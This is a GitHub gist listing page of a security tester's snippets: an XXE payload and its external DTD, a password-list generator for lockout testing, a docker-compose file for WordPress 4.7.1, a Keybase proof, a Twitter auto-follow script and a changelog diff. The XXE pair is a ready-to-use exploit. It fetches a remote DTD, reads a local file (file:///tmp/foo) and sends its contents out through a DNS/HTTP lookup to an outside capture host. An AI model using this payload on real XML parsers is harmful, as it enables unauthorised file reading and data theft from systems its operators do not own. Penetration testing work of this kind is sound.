Skip to content

Instantly share code, notes, and snippets.

Avatar

Marc Wickenden marcwickenden

View GitHub Profile
@marcwickenden
marcwickenden / XXE.xml
Created May 16, 2018
XXE payload to exploit dns exfil
View XXE.xml
<?xml version="1.0" ?>
<!DOCTYPE x [
<!ENTITY % oobfile SYSTEM "https://gist.githubusercontent.com/marcwickenden/acd0b23953b52e7c1a1a90925862d8e2/raw/98f3a015c12aa2d3288376281040ec003961c6dc/oob-dns.xml">
%oobfile;
%url;
%exfil;
]>
<x></x>
@marcwickenden
marcwickenden / oob-dns.xml
Created May 16, 2018
Example of data exfil using DNS in XXE. This will only work if the target file (/tmp/foo in this case) does not contain new lines. Good luck with that!
View oob-dns.xml
<!ENTITY % data SYSTEM "file:///tmp/foo">
<!ENTITY % url "<!ENTITY &#x25; exfil SYSTEM 'http://%data;.127.0.0.1.xip.io/capture'>">
@marcwickenden
marcwickenden / generate-intruder-passwords.sh
Created Aug 3, 2017
Generate payloads for testing account lockout with Intruder
View generate-intruder-passwords.sh
#!/bin/bash
# Usage: ./generate-intruder-passwords ThisisthecorrectPassword123 20
#
# The first argument is the correct password for the app.
# The second argument is the maximum number of password attempts to make.
# 20 is the default, if it hasn't locked you by then I'd say that's a finding.
# 
# The script will simply increment up to $LIMIT outputting n incorrect passwords and then the correct one.
# We enter the correct one to potentially reset the incorrect count.
View docker-compose.yml
version: '2'
services:
wordpress:
image: wordpress:4.7.1
ports:
- 8080:80
environment:
WORDPRESS_DB_PASSWORD: example
View keybase.md

Keybase proof

I hereby claim:

  • I am marcwickenden on github.
  • I am marcwickenden (https://keybase.io/marcwickenden) on keybase.
  • I have a public key ASD0R4SdJk8CnPiG_t4Y1LGCIbFQXlEM19O45DsoU4fMSwo

To claim this, I am signing this object:

@marcwickenden
marcwickenden / 100sec.rb
Created Nov 21, 2013
Automatically follow the @Marble_Security top-100-security-experts list members. If that's useful to you! You'll need to supply valid OAuth credentials from dev.twitter.com (read-write). You also need the twitter gem installed: gem install twitter Then just ruby 100sec.rb
View 100sec.rb
#!/usr/bin/env ruby
require 'twitter'
Twitter.configure do |config|
config.consumer_key = "<your consumer key>"
config.consumer_secret = "<your consumer secret>"
config.oauth_token = "<your oauth token>"
config.oauth_token_secret = "<your oauth token secret>"
end
@marcwickenden
marcwickenden / gist:7218936
Created Oct 29, 2013
Googlebot user agents
View gist:7218936
$ ruby apache_user_agent.rb
Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)
SAMSUNG-SGH-E250/1.0 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0 (compatible; Googlebot-Mobile/2.1; +http://www.google.com/bot.html)
Mozilla/5.0 (iPhone; CPU iPhone OS 6_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5376e Safari/8536.25 (compatible; Googlebot-Mobile/2.1; +http://www.google.com/bot.html)
View gist:4046089
diff -ruw exim-4.80/doc/ChangeLog exim-4.80.1/doc/ChangeLog
--- exim-4.80/doc/ChangeLog 2012-05-31 01:40:15.000000000 +0100
+++ exim-4.80.1/doc/ChangeLog 2012-10-25 04:37:38.000000000 +0100
@@ -1,6 +1,14 @@
Change log file for Exim from version 4.21
-------------------------------------------
+Exim version 4.80.1
+-------------------
+
You can’t perform that action at this time.